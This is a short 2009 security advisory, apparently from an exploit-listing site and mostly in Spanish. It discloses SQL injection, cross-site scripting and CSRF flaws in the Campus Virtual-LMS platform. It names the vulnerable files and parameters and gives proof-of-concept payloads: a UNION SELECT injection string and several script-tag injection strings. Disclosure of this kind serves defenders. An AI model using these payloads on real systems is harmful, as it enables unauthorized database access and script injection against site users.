Campus Virtual-LMS (XSS/SQL Injection) Multiple Remote Vulnerabilities

2009.06.24
Credit: Yasi
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352

+-----------------------------------------------------------------------------+ LMS: Campus Virtual-LMS WEB: http://campusvirtualcomputrade.cae.net Autor: Yasi Fecha: 12 jun 2009 +-----------------------------------------------------------------------------+ -----------------------------------------------------------------------------+ [+] SQLi -----------------------------------------------------------------------------+ Archivo: news/index.php [no logged] GET: ?id I: -1 union select 1,2,3,4,5,6,7 -----------------------------------------------------------------------------+ -----------------------------------------------------------------------------+ [+] XSS -----------------------------------------------------------------------------+ Archivo: enrolments/step1.php [no logged] GET: ?courseid I: 1"><script>alert(/xD/.source)</script> Archivo: files/shared_list.php [logged] GET/POST: ?search I: "><script>alert(/xD/.source)</script><!-- Archivo: files/shared_list.php [logged] GET: ?siteid I: "><script>alert(/xD/.source)</script><!-- -----------------------------------------------------------------------------+ -----------------------------------------------------------------------------+ [+] CSRF -----------------------------------------------------------------------------+ Archivo: login/logout.php Info: Desconecta al usuario mediante una imagen, un redireccionamiento, un link... Archivo: enrolments/step2.php GET: ?action=[ACTION]&orderid=[ORDERID]&courseid=[COURSEID] Info: A&#195;&#177;ade o elimina [ADD/DELETE] el curso identificado por COURSEID a la cesta identificada por ODERID. Ser&#195;a necesario conocer por adelantado la cesta del usuario. (No explotable) -----------------------------------------------------------------------------+ +-----------------------------------------------------------------------------+ Gretz: UnderSecurity.net +-----------------------------------------------------------------------------+


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top